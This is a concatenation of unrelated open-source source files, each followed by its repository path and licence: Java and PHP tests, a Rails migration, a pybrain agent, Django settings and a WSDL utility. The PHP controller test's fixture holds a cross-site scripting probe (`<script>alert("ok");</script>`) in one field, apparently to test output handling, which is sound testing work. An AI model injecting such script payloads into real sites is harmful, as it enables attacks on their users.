cluster.close();
server.close();
}
public void initialiseLockTable() throws ConfigurationException, URISyntaxException {
cqlPaths = asList(getResourcePath("cql_bootstrap"), getResourcePath("cql_consistency_level"));
cluster.prime(when("select cluster_name from system.local where key = 'local'")
.then(rows().row("cluster_name", "0").build()));
cluster.prime(primeInsertQuery(TEST_KEYSPACE, lockConfig.getClientId(), true));
cluster.prime(primeDeleteQuery(TEST_KEYSPACE, lockConfig.getClientId(), true, UUID.randomUUID().toString()));
}
private Path getResourcePath(String resourcePath) throws URISyntaxException {
return Paths.get(ClassLoader.getSystemResource(resourcePath).toURI());
}
@Test
public void shouldApplyCorrectDefaultConsistencyLevelsConfiguredForUnderlyingQueries() throws Exception {
//arrange
ConsistencyLevel expectedDefaultReadConsistencyLevel = ConsistencyLevel.LOCAL_ONE;
ConsistencyLevel expectedDefaultWriteConsistencyLevel = ConsistencyLevel.ALL;
CqlMigrator migrator = CqlMigratorFactory.create(lockConfig);
//act
executeMigration(migrator, cqlPaths);
//assert
assertStatementsExecuteWithExpectedConsistencyLevels(expectedDefaultReadConsistencyLevel, expectedDefaultWriteConsistencyLevel);
}
private void executeMigration(CqlMigrator migrator, Collection<Path> cqlPaths) {
String[] hosts = new String[]{"localhost"};
migrator.migrate(hosts, LOCAL_DC, defaultStartingPort, username, password, TEST_KEYSPACE, cqlPaths);
}
@Test
public void shouldApplyCorrectCustomisedConsistencyLevelsConfiguredForUnderlyingQueries() throws Exception {
//arrange
ConsistencyLevel expectedReadConsistencyLevel = ConsistencyLevel.LOCAL_QUORUM;
ConsistencyLevel expectedWriteConsistencyLevel = ConsistencyLevel.EACH_QUORUM;
CqlMigrator migrator = CqlMigratorFactory.create(CqlMigratorConfig.builder()
.withLockConfig(lockConfig)
.withReadConsistencyLevel(expectedReadConsistencyLevel)
.withWriteConsistencyLevel(expectedWriteConsistencyLevel)
.build()
);
//act
executeMigration(migrator, cqlPaths);
//assert
assertStatementsExecuteWithExpectedConsistencyLevels(expectedReadConsistencyLevel, expectedWriteConsistencyLevel);
}
private static com.datastax.oss.simulacron.common.codec.ConsistencyLevel toSimulacronConsistencyLevel(ConsistencyLevel driverConsistencyLevel) {
return com.datastax.oss.simulacron.common.codec.ConsistencyLevel.fromString(driverConsistencyLevel.toString());
}
private void assertStatementsExecuteWithExpectedConsistencyLevels(ConsistencyLevel expectedReadConsistencyLevel, ConsistencyLevel expectedWriteConsistencyLevel) {
//bootstrap.cql is already "applied" as we are priming cassandra to pretend it already has the keyspace
//ensure that schema updates are applied at configured consistency level
List<QueryLog> queryLogs = cluster.getLogs().getQueryLogs().stream()
.filter(queryLog -> queryLog.getFrame().message.toString().contains("CREATE TABLE consistency_test (column1 text primary key, column2 text)"))
.filter(queryLog -> queryLog.getConsistency().equals(toSimulacronConsistencyLevel(expectedWriteConsistencyLevel)))
.collect(Collectors.toList());
assertThat(queryLogs.size()).isEqualTo(1);
// ensure that any reads from schema updates are read at the configured consistency level
queryLogs = cluster.getLogs().getQueryLogs().stream()
.filter(queryLog -> queryLog.getFrame().message.toString().contains("SELECT * FROM cqlmigrate_test.schema_updates where filename = ?"))
.filter(queryLog -> queryLog.getConsistency().equals(toSimulacronConsistencyLevel(expectedReadConsistencyLevel)))
.collect(Collectors.toList());
assertThat(queryLogs.size()).isEqualTo(1);
//ensure that any inserts into schema updates are done at the configured consistency level
queryLogs = cluster.getLogs().getQueryLogs().stream()
.filter(queryLog -> queryLog.getFrame().message.toString().contains("INSERT INTO schema_updates (filename, checksum, applied_on) VALUES (?, ?, dateof(now()));"))
.filter(queryLog -> queryLog.getConsistency().equals(toSimulacronConsistencyLevel(expectedWriteConsistencyLevel)))
.collect(Collectors.toList());
assertThat(queryLogs.size()).isEqualTo(1);
//ensure that use keyspace is done at the configured consistency level
queryLogs = cluster.getLogs().getQueryLogs().stream()
.filter(queryLog -> queryLog.getFrame().message.toString().contains("USE cqlmigrate_test;"))
.filter(queryLog -> queryLog.getConsistency().equals(toSimulacronConsistencyLevel(expectedReadConsistencyLevel)))
.collect(Collectors.toList());
assertThat(queryLogs.size()).isGreaterThanOrEqualTo(1);
//ensure that create schema_updates table is done at the configured consistency level
queryLogs = cluster.getLogs().getQueryLogs().stream()
.filter(queryLog -> queryLog.getFrame().message.toString().contains("CREATE TABLE schema_updates (filename text primary key, checksum text, applied_on timestamp);"))
.filter(queryLog -> queryLog.getConsistency().equals(toSimulacronConsistencyLevel(expectedWriteConsistencyLevel)))
.collect(Collectors.toList());
assertThat(queryLogs.size()).isEqualTo(1);
}
private static PrimeDsl.PrimeBuilder primeInsertQuery(String lockName, String clientId, boolean lockApplied) {
String prepareInsertQuery = "INSERT INTO cqlmigrate.locks (name, client) VALUES (?, ?) IF NOT EXISTS";
PrimeDsl.PrimeBuilder primeBuilder = when(query(
prepareInsertQuery,
Lists.newArrayList(
com.datastax.oss.simulacron.common.codec.ConsistencyLevel.ONE,
com.datastax.oss.simulacron.common.codec.ConsistencyLevel.ALL),
new LinkedHashMap<>(ImmutableMap.of("name", lockName + ".schema_migration", "client", clientId)),
new LinkedHashMap<>(ImmutableMap.of("name", "varchar", "client", "varchar"))))
.then(rows().row(
"[applied]", valueOf(lockApplied), "client", CLIENT_ID).columnTypes("[applied]", "boolean", "clientid", "varchar")
);
return primeBuilder;
}
private static PrimeDsl.PrimeBuilder primeDeleteQuery(String lockName, String clientId, boolean lockApplied, String lockHoldingClient) {
String deleteQuery = "DELETE FROM cqlmigrate.locks WHERE name = ? IF client = ?";
PrimeDsl.PrimeBuilder primeBuilder = when(query(
deleteQuery,
Lists.newArrayList(
com.datastax.oss.simulacron.common.codec.ConsistencyLevel.ONE,
com.datastax.oss.simulacron.common.codec.ConsistencyLevel.ALL),
new LinkedHashMap<>(ImmutableMap.of("name", lockName + ".schema_migration", "client", clientId)),
new LinkedHashMap<>(ImmutableMap.of("name", "varchar", "client", "varchar"))))
.then(rows()
.row("[applied]", valueOf(lockApplied), "client", lockHoldingClient).columnTypes("[applied]", "boolean", "clientid", "varchar"));
return primeBuilder;
}
private void setupKeyspace(String keyspaceName) {
BoundCluster simulacron = cluster;
Map<String, String> keyspaceColumns = ImmutableMap.of(
"keyspace_name", "varchar",
"durable_writes", "boolean",
"replication", "map<varchar, varchar>");
List<LinkedHashMap<String, Object>> allKeyspacesRows = new ArrayList<>();
LinkedHashMap<String, Object> keyspaceRow = new LinkedHashMap<>();
keyspaceRow.put("keyspace_name", keyspaceName);
keyspaceRow.put("durable_writes", true);
keyspaceRow.put(
"replication",
ImmutableMap.of(
"class", "org.apache.cassandra.locator.SimpleStrategy", "replication_factor", "1"));
allKeyspacesRows.add(keyspaceRow);
// prime the query the driver issues when fetching a single keyspace
Query whenSelectKeyspace =
new Query("SELECT * FROM system_schema.keyspaces WHERE keyspace_name = '" + keyspaceName + '\'');
SuccessResult thenReturnKeyspace =
new SuccessResult(Collections.singletonList(new LinkedHashMap<>(keyspaceRow)), new LinkedHashMap<>(keyspaceColumns));
RequestPrime primeKeyspace = new RequestPrime(whenSelectKeyspace, thenReturnKeyspace);
simulacron.prime(new Prime(primeKeyspace));
// prime the query the driver issues when fetching all keyspaces
Query whenSelectAllKeyspaces = new Query("SELECT * FROM system_schema.keyspaces");
SuccessResult thenReturnAllKeyspaces = new SuccessResult(allKeyspacesRows, new LinkedHashMap<>(keyspaceColumns));
RequestPrime primeAllKeyspaces =
new RequestPrime(whenSelectAllKeyspaces, thenReturnAllKeyspaces);
simulacron.prime(new Prime(primeAllKeyspaces));
}
}
| sky-uk/cqlmigrate | src/test/java/uk/sky/cqlmigrate/CqlMigratorConsistencyLevelIntegrationTest.java | Java | bsd-3-clause | 12,518 |
<?php
use Core\Test\ControllerTestCase;
use Application\Controller\IndexController;
use Application\Model\Chamado;
use Zend\Http\Request;
use Zend\Stdlib\Parameters;
use Zend\View\Renderer\PhpRenderer;
/**
* @group Controller
*/
class IndexControllerTest extends ControllerTestCase
{
/**
* Namespace completa do Controller
* @var string
*/
protected $controllerFQDN = 'Application\Controller\IndexController';
/**
* Nome da rota. Geralmente o nome do módulo
* @var string
*/
protected $controllerRoute = 'application';
/**
* Testa o acesso a uma action que não existe
*/
public function test404()
{
$this->routeMatch->setParam('action', 'action_nao_existente');
$result = $this->controller->dispatch($this->request);
$response = $this->controller->getResponse();
$this->assertEquals(404, $response->getStatusCode());
}
/**
* Testa a página inicial, que deve mostrar os chamados
*/
public function testIndexAction()
{
// Cria técnicos para testar
$chamadoA = $this->addChamado();
$chamadoB = $this->addChamado();
// Invoca a rota index
$this->routeMatch->setParam('action', 'index');
$result = $this->controller->dispatch($this->request, $this->response);
// Verifica o response
$response = $this->controller->getResponse();
$this->assertEquals(200, $response->getStatusCode());
// Testa se um ViewModel foi retornado
$this->assertInstanceOf('Zend\View\Model\ViewModel', $result);
// Testa os dados da view
$variables = $result->getVariables();
$this->assertArrayHasKey('chamados', $variables);
// Faz a comparação dos dados
$controllerData = $variables["chamados"];
$this->assertEquals($chamadoA->chamado_cobra, $controllerData[0]['chamado_cobra']);
$this->assertEquals($chamadoB->chamado_cobra, $controllerData[1]['chamado_cobra']);
}
/**
* Testa a página inicial, que deve mostrar os chamados com paginador
*/
/*public function testIndexActionPaginator()
{
// Cria chamados para testar
$chamado = array();
for($i=0; $i< 25; $i++) {
$chamado[] = $this->addChamado();
}
// Invoca a rota index
$this->routeMatch->setParam('action', 'index');
$result = $this->controller->dispatch($this->request, $this->response);
// Verifica o response
$response = $this->controller->getResponse();
$this->assertEquals(200, $response->getStatusCode());
// Testa se um ViewModel foi retornado
$this->assertInstanceOf('Zend\View\Model\ViewModel', $result);
// Testa os dados da view
$variables = $result->getVariables();
$this->assertArrayHasKey('chamados', $variables);
//testa o paginator
$paginator = $variables["chamados"];
$this->assertEquals('Zend\Paginator\Paginator', get_class($paginator));
$chamados = $paginator->getCurrentItems()->toArray();
$this->assertEquals(10, count($chamados));
$this->assertEquals($chamado[0]->id, $chamados[0]['id']);
$this->assertEquals($chamado[1]->id, $chamados[1]['id']);
//testa a terceira página da paginação
$this->routeMatch->setParam('action', 'index');
$this->routeMatch->setParam('page', 3);
$result = $this->controller->dispatch($this->request, $this->response);
$variables = $result->getVariables();
$controllerData = $variables["chamados"]->getCurrentItems()->toArray();
$this->assertEquals(5, count($controllerData));
}*/
/**
* Adiciona um chamado para os testes
*/
private function addChamado()
{
$chamado = new Chamado();
$chamado->numero = '12345678901234';
$chamado->chamado_cobra = '123456789012345';
$chamado->dependencia = 'Matriz I <script>alert("ok");</script><br>';
$chamado->dtachamado = date('Y-m-d H:i:s');
$chamado->dtalimite = date('Y-m-d H:i:s');
$chamado->status = '12345678901234567890';
$chamado->tecnico_alocado = 'Antonio';
$chamado->agencia = '1234';
$chamado->nrocontrato = '1234567890123';
$chamado->grupo = 'TAA';
$chamado->observacao = 'Teste OBS';
$saved = $this->getTable('Application\Model\Chamado')->save($chamado);
return $chamado;
}
} | afntoninho/trampo | module/Application/tests/src/Application/Controller/IndexControllerTest.php | PHP | bsd-3-clause | 4,501 |
require 'save_without_timestamping'
#Needed because Asset model may not exist any more
class Asset < ActiveRecord::Base
belongs_to :resource, :polymorphic => true
end
class TransferAssetDataToResources < ActiveRecord::Migration
def self.up
count = 0
Asset.all.each do |asset|
resource = asset.resource
resource.policy_id = asset.policy_id
resource.project_id = asset.project_id
if resource.save_without_timestamping
count += 1
end
if ["DataFile","Model","Protocol"].include?(resource.class.name)
resource.versions.each do |version|
version.policy_id = asset.policy_id
version.project_id = asset.project_id
version.save_without_timestamping
end
end
end
puts "#{count}/#{Asset.count} asset resources updated."
end
def self.down
count = 0
Asset.all.each do |asset|
resource = asset.resource
resource.policy_id = nil
resource.project_id = nil
if ["DataFile","Model","Protocol"].include?(resource.class.name)
resource.versions.each do |version|
version.policy_id = nil
version.project_id = nil
version.save_without_timestamping
end
end
if resource.save_without_timestamping
count += 1
end
end
puts "#{count}/#{Asset.count} asset resources reverted."
end
end
| njall/wel-seek | db/migrate/archive/20100708073047_transfer_asset_data_to_resources.rb | Ruby | bsd-3-clause | 1,406 |
__author__ = 'Thomas Rueckstiess, ruecksti@in.tum.de'
from agent import Agent
from pybrain.datasets import ReinforcementDataSet
class HistoryAgent(Agent):
""" This agent stores actions, states, and rewards encountered during interaction with an environment
in a ReinforcementDataSet (which is a variation of SequentialDataSet). The stored history can
be used for learning and is erased by resetting the agent. It also makes sure that integrateObservation,
getAction and giveReward are called in exactly that order. """
def __init__(self, indim, outdim):
# store input and output dimension
self.indim = indim
self.outdim = outdim
# create history dataset
self.remember = True
self.history = ReinforcementDataSet(indim, outdim)
# initialize temporary variables
self.lastobs = None
self.lastaction = None
def integrateObservation(self, obs):
""" 1. stores the observation received in a temporary variable until action is called and
reward is given. """
assert self.lastobs == None
assert self.lastaction == None
self.lastobs = obs
def getAction(self):
""" 2. stores the action in a temporary variable until reward is given. """
assert self.lastobs != None
assert self.lastaction == None
# implement getAction in subclass and set self.lastaction
def enableHistory(self):
self.remember = True
def disableHistory(self):
self.remember = False
def giveReward(self, r):
""" 3. stores observation, action and reward in the history dataset. """
# step 3: assume that state and action have been set
assert self.lastobs != None
assert self.lastaction != None
# store state, action and reward in dataset
if self.remember:
self.history.addSample(self.lastobs, self.lastaction, r)
self.lastobs = None
self.lastaction = None
def reset(self):
""" clears the history of the agent. """
self.history.clear()
| daanwierstra/pybrain | pybrain/rl/agents/history.py | Python | bsd-3-clause | 2,202 |
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'test.sqlite',
}
}
INSTALLED_APPS = [
'nocaptcha_recaptcha',
]
MIDDLEWARE_CLASSES = [
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.doc.XViewMiddleware',
'django.middleware.common.CommonMiddleware',
]
NORECAPTCHA_SECRET_KEY = 'privkey'
NORECAPTCHA_SITE_KEY = 'pubkey'
| ImaginaryLandscape/django-nocaptcha-recaptcha | test_settings.py | Python | bsd-3-clause | 636 |
# -*- coding: utf-8 -*-
"""Test forms."""
from personal_website.article.forms import ArticleForm
from personal_website.public.forms import LoginForm
class TestArticleForm:
"""Article Form."""
def test_title_required(self, article):
"""Publish article."""
form = ArticleForm(body=article.body, published=article.published)
assert form.validate() is False
assert 'title - This field is required.' in form.title.errors
def test_validate_title_exists(self, article):
"""Title already exists."""
article.published = True
article.save()
form = ArticleForm(title=article.title, body=article.body, published=True)
assert form.validate() is False
assert 'Title already Used' in form.title.errors
def test_validate_slug_exists(self, article):
"""Title already exists."""
article.published = True
article.save()
form = ArticleForm(title=article.title, body=article.body, published=True)
assert form.validate() is False
assert 'Error producing url. Try a different title.' in form.title.errors
class TestLoginForm:
"""Login form."""
def test_validate_success(self, user):
"""Login successful."""
user.set_password('example')
user.save()
form = LoginForm(username=user.username, password='example')
assert form.validate() is True
assert form.user == user
def test_validate_unknown_username(self, db):
"""Unknown username."""
form = LoginForm(username='unknown', password='example')
assert form.validate() is False
assert 'Unknown username' in form.username.errors
assert form.user is None
def test_validate_invalid_password(self, user):
"""Invalid password."""
user.set_password('example')
user.save()
form = LoginForm(username=user.username, password='wrongpassword')
assert form.validate() is False
assert 'Invalid password' in form.password.errors
def test_validate_inactive_user(self, user):
"""Inactive user."""
user.active = False
user.set_password('example')
user.save()
# Correct username and password, but user is not activated
form = LoginForm(username=user.username, password='example')
assert form.validate() is False
assert 'User not activated' in form.username.errors
| arewellborn/Personal-Website | tests/test_forms.py | Python | bsd-3-clause | 2,446 |
from django.contrib import admin
import models
admin.site.register(models.Song)
admin.site.register(models.Station)
admin.site.register(models.Vote)
admin.site.register(models.StationPoll)
admin.site.register(models.StationVote) | f4nt/djpandora | djpandora/admin.py | Python | bsd-3-clause | 230 |
/**
*============================================================================
* Copyright The Ohio State University Research Foundation, The University of Chicago -
* Argonne National Laboratory, Emory University, SemanticBits LLC, and
* Ekagra Software Technologies Ltd.
*
* Distributed under the OSI-approved BSD 3-Clause License.
* See http://ncip.github.com/cagrid-core/LICENSE.txt for details.
*============================================================================
**/
package gov.nih.nci.cagrid.data.utilities.validation;
import gov.nih.nci.cagrid.common.Utils;
import java.net.URI;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import javax.wsdl.Definition;
import javax.wsdl.Import;
import javax.wsdl.Types;
import javax.wsdl.WSDLException;
import javax.wsdl.extensions.ExtensibilityElement;
import javax.wsdl.extensions.UnknownExtensibilityElement;
import javax.wsdl.factory.WSDLFactory;
import javax.wsdl.xml.WSDLReader;
import javax.xml.namespace.QName;
import org.apache.axis.message.addressing.EndpointReferenceType;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.jdom.input.DOMBuilder;
import org.w3c.dom.Element;
/**
* @author oster
*/
public class WSDLUtils {
protected static Log LOG = LogFactory.getLog(WSDLUtils.class.getName());
public static Definition parseServiceWSDL(String wsdlLocation) throws WSDLException {
WSDLFactory factory = WSDLFactory.newInstance();
WSDLReader wsdlReader = factory.newWSDLReader();
wsdlReader.setFeature("javax.wsdl.verbose", LOG.isDebugEnabled());
wsdlReader.setFeature("javax.wsdl.importDocuments", true);
Definition mainDefinition = wsdlReader.readWSDL(wsdlLocation);
return mainDefinition;
}
public static String getWSDLLocation(EndpointReferenceType epr) {
return epr.getAddress().toString() + "?wsdl";
}
public static void walkWSDLFindingSchema(Definition mainDefinition, Map<String, org.jdom.Element> schemas) {
LOG.debug("Looking at WSDL at:" + mainDefinition.getDocumentBaseURI());
org.jdom.Element schema = extractTypesSchema(mainDefinition);
if (schema != null) {
LOG.debug("Found types schema.");
schemas.put(mainDefinition.getDocumentBaseURI(), schema);
} else {
LOG.debug("No types schema found.");
}
LOG.debug("Looking for imports...");
Map imports = mainDefinition.getImports();
if (imports != null) {
Iterator iter = imports.values().iterator();
while (iter.hasNext()) {
LOG.debug("Found imports...");
List wsdlImports = (List) iter.next();
for (int i = 0; i < wsdlImports.size(); i++) {
Import wsdlImport = (Import) wsdlImports.get(i);
Definition importDefinition = wsdlImport.getDefinition();
if (importDefinition != null) {
LOG.debug("Looking at imported WSDL at:" + importDefinition.getDocumentBaseURI());
walkWSDLFindingSchema(importDefinition, schemas);
}
}
}
}
}
public static org.jdom.Element extractTypesSchema(Definition wsdlDefinition) {
org.jdom.Element typesSchemaElm = null;
if (wsdlDefinition != null) {
Types types = wsdlDefinition.getTypes();
if (types != null) {
List extensibilityElements = types.getExtensibilityElements();
for (int i = 0; i < extensibilityElements.size(); i++) {
ExtensibilityElement schemaExtElem = (ExtensibilityElement) extensibilityElements.get(i);
if (schemaExtElem != null) {
QName elementType = schemaExtElem.getElementType();
if (elementType.getLocalPart().equals("schema")
&& (schemaExtElem instanceof UnknownExtensibilityElement)) {
Element element = ((UnknownExtensibilityElement) schemaExtElem).getElement();
DOMBuilder domBuilder = new DOMBuilder();
typesSchemaElm = domBuilder.build(element);
}
}
}
}
}
return typesSchemaElm;
}
public static URI determineSchemaLocation(Map<String, org.jdom.Element> schemas, String namespace) {
LOG.debug("Trying to find XSD location of namespace:" + namespace);
if (schemas != null) {
Iterator<String> iterator = schemas.keySet().iterator();
while (iterator.hasNext()) {
String mainURI = iterator.next();
org.jdom.Element schema = schemas.get(mainURI);
Iterator<?> childIter = schema.getChildren("import", schema.getNamespace()).iterator();
while (childIter.hasNext()) {
org.jdom.Element importElm = (org.jdom.Element) childIter.next();
String ns = importElm.getAttributeValue("namespace");
if (ns.equals(namespace)) {
String location = importElm.getAttributeValue("schemaLocation");
LOG.debug("Found relative XSD location of namespace (" + namespace + ")=" + location);
URI schemaURI = URI.create(Utils.encodeUrl(mainURI));
URI importURI = schemaURI.resolve(location);
LOG.debug("Converted complete location of namespace (" + namespace + ") to: "
+ importURI.toString());
return importURI;
}
}
}
}
return null;
}
}
| NCIP/cagrid-core | caGrid/projects/data/src/java/utilities/gov/nih/nci/cagrid/data/utilities/validation/WSDLUtils.java | Java | bsd-3-clause | 4,989 |